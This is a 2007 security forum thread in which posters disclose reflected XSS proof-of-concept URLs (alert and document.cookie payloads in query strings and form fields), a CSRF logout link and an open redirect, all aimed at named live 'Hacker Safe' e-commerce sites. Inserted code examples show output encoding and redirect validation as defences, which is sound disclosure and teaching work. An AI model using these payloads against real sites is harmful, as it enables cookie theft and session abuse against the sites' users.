sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Re: Hacker safe!
Posted by: tx
Date: January 25, 2007 04:48PM

*delurk*
A bit late, but here y'all go:

Dentalplans.com #1 (jscript escape): http://dentalplans.com/savingsportal/category.asp?categoryid=';alert('xss');var%20d='yourmom

Dentalplans.com #2: http://dentalplans.com/moreinfo/emailpagetofriend.asp?sURL=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%78%73%73%27%29%3B%3C%2F%73%63%72%69%70%74%3E

-tx

Re: Hacker safe!
Posted by: rsnake
Date: January 25, 2007 06:05PM

Nice shootin' Tex.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Hacker safe!
Posted by: Lockdown
Date: January 31, 2007 07:59PM

Yeah, I'm a bit late too. Damn man, we could totally start our own XSS Security Company. We could totally destroy the reputation of all other companies too (due to their suckage)

A whole lot more "HackerSafe" XSS Vulns:

http://www.acehardware.com/search/noResults.jsp?kw=rofl%3Cscript%3Ealert('xss');%3C/script%3E
https://www.hrsaccount.com/hrs/ecare;jsessionid=?cmd_DisplayContactUsNLI=&org=202&gciOrg=202 << POSTDATA XSS vuln, "> <script>alert("xss");</script> on every entrance in that form, plus the </textarea> .. I'm too lazy to use WhiteAcid's script to really illustrate it though.
Actually on the hackersafe "store.aetv.com" http://store.aetv.com/html/search/searchindex.jhtml?search=dvd&itemType=All&x=0&y=0&key=||fat||&_requestid=nullLOLhai%3C%3E'%22hax)-&id=LOL%22;}alert('XSS');%3C/script%3E

Man, I'm disappointed. I can do better. I'll be back later to get a few more.

We rock hard.

Re: Hacker safe!
Posted by: tx
Date: February 01, 2007 04:02PM

I came in to work yesterday and I had an email waiting for me from one of my clients asking to add a Hacker Safe logo to his e-commerce site.
I asked him about their services: apparently he's paying just about $2k/yr. for their periodic automated vuln scanning (I checked the scan alert site for the complete list of about 4000 issues they look for, it largely checks version numbers, and there were no issues later than mid 2006 or so).
*sigh* 2 grand a year for "no warranty or claim of any kind, whatsoever, about the accuracy or usefulness of any information provided herein".
Hell, I'd scan their site and provide no warranty for half that!

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 02/01/2007 04:07PM by tx.

Re: Hacker safe!
Posted by: SW
Date: February 01, 2007 10:11PM

This thread looks like it was fun. -.-

Their main site uses all html boo.

All I could find:
[www.scanalert.com]

Re: Hacker safe!
Posted by: Kyran
Date: February 01, 2007 11:36PM

Great! The hype may have died down a bit, but UXSS is still an issue.

And yeah, the earlier days of the mass finding were very amusing.

- Kyran

Re: Hacker safe!
Posted by: jungsonn
Date: February 02, 2007 10:22AM

Ghehe I'm sure there are other scan companies, you could try them out.

Re: Hacker safe!
Posted by: apnovi
Date: February 08, 2007 04:48PM

Another

http://www.uscav.com/search.aspx?Search=%3cscript%3ealert(%22XSS%22)%3c%2fscript%3e

Re: Hacker safe!
Posted by: tx
Date: February 09, 2007 04:40PM

This thread got a mention so I thought I'd throw up a line here.

From DarkReading.com :
"Are 'Sealed' Websites Any Safer?"

http://www.darkreading.com/document.asp?doc_id=116862&print=true

-tx @ lowtech-labs.org

Re: Hacker safe!
Posted by: Kyran
Date: February 09, 2007 10:22PM

Hey, I was quoted! :P

But yeah, these little images really do nothing as we already established.

snakeoil.gif

- Kyran

Re: Hacker safe!
Posted by: jungsonn
Date: February 10, 2007 10:10AM

Haha:

Quote

ScanAlert CEO and founder Ken Leonard says the ROI aspect of the Hacker Safe seal helps IT not only meet a standard of security but also appeals to an organization's marketing department. "The marketing department sees the advantage of Hacker Safe," he says.

"standard of security" Pardon me?

Yeah the marketing department... sees dollar signs, they don't really care about security, they don't care about people's privacy, and they don't care about if YOUR information is stolen, they're out to pick your pocket and nothing else. And they call themselves "marketeers".

To truly marketeer customers, is based on a relationship, building trust and bonding with them, not lying to them. That takes time, but in the end this customer will be a customer for life.

Re: Hacker safe!
Posted by: tx
Date: February 12, 2007 03:37PM

When it comes down to it, they do sell a realistic service (although not a real one). From reviewing their site it's quite obvious that security has little or nothing to do with their product, they are really just selling "customer/user conversion" to e-commerce websites. Which is a valid investment for an e-commerce site, even at the expense of the users' privacy/safety. That doesn't mean I don't think that scanalert are taking advantage. They definitely are.
Frankly, I hope some "Hacker Safe" site gets exploited and the users band together and throw up a class action lawsuit...

-tx @ lowtech-labs.org

Re: Hacker safe!
Posted by: jungsonn
Date: February 13, 2007 07:41PM

I surely do, I've seen enough holes; but do not have the time or interest to exploit it. FUBAR all the way.

:)

Re: Hacker safe!
Posted by: FR3DC3RV
Date: March 15, 2007 01:22PM

Search " onclick=javascript:alert(document.cookie)//

http://www.no-ip.com/domSearch.php

-------------------------------
http://fr3dc3rv.blogspot.com

Re: Hacker safe!
Posted by: Spencer
Date: March 17, 2007 07:24PM

Or simply: http://www.no-ip.com/whois/?domain=<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

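The reports in this thread land in three different output contexts: a JavaScript string literal (tx's "jscript escape"), HTML element content (the reflected search terms), and a quoted attribute value (the `" onclick=` inputs). The following is an added example, not code from any poster or from the affected sites, showing an encoder for each context beside unencoded rendering; the function names and page templates are hypothetical.

```javascript
// Added example: one encoder per output context. Templates are hypothetical.

// HTML element content and attribute values: everything except
// alphanumerics and a few punctuation marks becomes a numeric entity.
function encodeHtml(s) {
  return String(s).replace(/[^A-Za-z0-9.,_]/gu,
    c => '&#x' + c.codePointAt(0).toString(16) + ';');
}

// JavaScript string literal inside a <script> block: \uXXXX per UTF-16 code
// unit, so quotes, backslashes and "</script>" cannot end the string or element.
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9 .,_]/g,
    c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Unencoded rendering (assumed shape of the reported pages).
const naive = {
  body:   kw => `<p>No results for ${kw}</p>`,
  attr:   q  => `<input name="q" value="${q}">`,
  script: id => `<script>var categoryId = '${id}';</script>`,
};

const hardened = {
  body:   kw => `<p>No results for ${encodeHtml(kw)}</p>`,
  attr:   q  => `<input name="q" value="${encodeHtml(q)}">`,
  script: id => `<script>var categoryId = '${encodeJsString(id)}';</script>`,
};

// Inputs taken (URL-decoded) from the posts above.
const samples = {
  body:   "rofl<script>alert('xss');</script>",
  attr:   '" onclick=javascript:alert(document.cookie)//',
  script: "';alert('xss');var d='yourmom",
};

// Each pattern matches only markup that still has the template's structure.
const shape = {
  body:   /^<p>No results for [^<>]*<\/p>$/,
  attr:   /^<input name="q" value="[^"<>]*">$/,
  script: /^<script>var categoryId = '(?:[^'\\<>]|\\u[0-9a-f]{4})*';<\/script>$/,
};
function intact(render, ctx) {
  return shape[ctx].test(render[ctx](samples[ctx]));
}

for (const ctx of Object.keys(samples)) {
  console.log(ctx, 'naive intact:', intact(naive, ctx),
    '| hardened intact:', intact(hardened, ctx));
}
```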
Re: Hacker safe!
Posted by: FR3DC3RV
Date: March 18, 2007 06:04AM

Some more:

http://www.no-ip.com/newUser.php?email=%22%20onclick=javascript:alert(document.cookie)//&password=&c_password=&firstname=&lastname=&heard_about=&postal_code=&security_q=&security_a=&bmonth=0&bday=dd&byear=yyyy&captcha_id=AXxiNQAY&captcha=&tos=&I%20Accept.%20Create%20my%20Account&Create=submit

http://www.rumo.com.br/sistema/Home.asp?Pagina=FaleConosco&IDLoja=1&Y=6562974305810&Nome=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&Email=a@a.fr&NomeLoja=a&Assunto=1&Mensagem=a&Gravar=+++Enviar+++

Both of them were originally POST but they also work with GET.

https://secure5.electronic-payment.com/members/login.php?s=sp&SID=3&e="><script>alert(document.cookie)</script>

Insert your Username as " onclick=javascript:alert(1)//

https://www.mals-e.com/login.php
https://www.mals-e.com/password.php

CSRF:
Create a new account and login, then try the following URLs and you will be logged out.

http://www.shoppbs.org/home/index.jsp?step=logout

https://secure5.electronic-payment.com/members/login.php?s=logout&SN=Binoculars&SID=3

Redirection:

Press the button and you will be redirected.
http://ww1.aitsafe.com/cf/review.cfm?userid=3100170&return=fr3dc3rv.blogspot.com

-------------------------------
http://fr3dc3rv.blogspot.com



Edited 2 time(s). Last edit at 03/18/2007 12:07PM by FR3DC3RV.

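The `return=` parameter in the redirection report above carries a bare host name that the browser is then sent to. One way to constrain such a parameter on the server is shown here as an added example, not code from the thread or from the affected site; `safeReturnTarget`, `BASE` and `ALLOWED_HOSTS` are hypothetical names with constructed values.

```javascript
// Added example: validating a post-action redirect parameter.
// BASE and ALLOWED_HOSTS are constructed placeholders for the site's own origins.
const BASE = 'https://shop.example';
const ALLOWED_HOSTS = new Set(['shop.example', 'pay.shop.example']);

function safeReturnTarget(raw, fallback = '/') {
  if (typeof raw !== 'string' || raw === '') return fallback;
  // Browsers strip tabs/newlines and treat "\" as "/" in URLs, so refuse both.
  if (/[\u0000-\u001f\\]/.test(raw)) return fallback;
  let url;
  try {
    // Scheme-less input resolves as a path on BASE; no scheme is ever prepended.
    url = new URL(raw, BASE);
  } catch {
    return fallback;
  }
  if (url.protocol !== 'https:') return fallback;
  if (url.username || url.password) return fallback;   // user@host confusion
  if (!ALLOWED_HOSTS.has(url.host)) return fallback;   // exact host (and port)
  // Same-origin targets are returned as a path; allowlisted hosts as a full URL.
  return url.origin === BASE
    ? url.pathname + url.search + url.hash
    : url.href;
}

// Constructed inputs; the first is the value used in the post above.
const cases = [
  'fr3dc3rv.blogspot.com',
  '//fr3dc3rv.blogspot.com',
  'http://fr3dc3rv.blogspot.com',
  'https://shop.example.fr3dc3rv.blogspot.com/',
  'https://shop.example@fr3dc3rv.blogspot.com/',
  '/\\fr3dc3rv.blogspot.com',
  '/cart?step=2',
  'https://pay.shop.example/done',
];
for (const c of cases) console.log(JSON.stringify(c), '->', safeReturnTarget(c));
```

The bare host name ends up as a local path on the site's own origin, so the request stays on the site instead of leaving it.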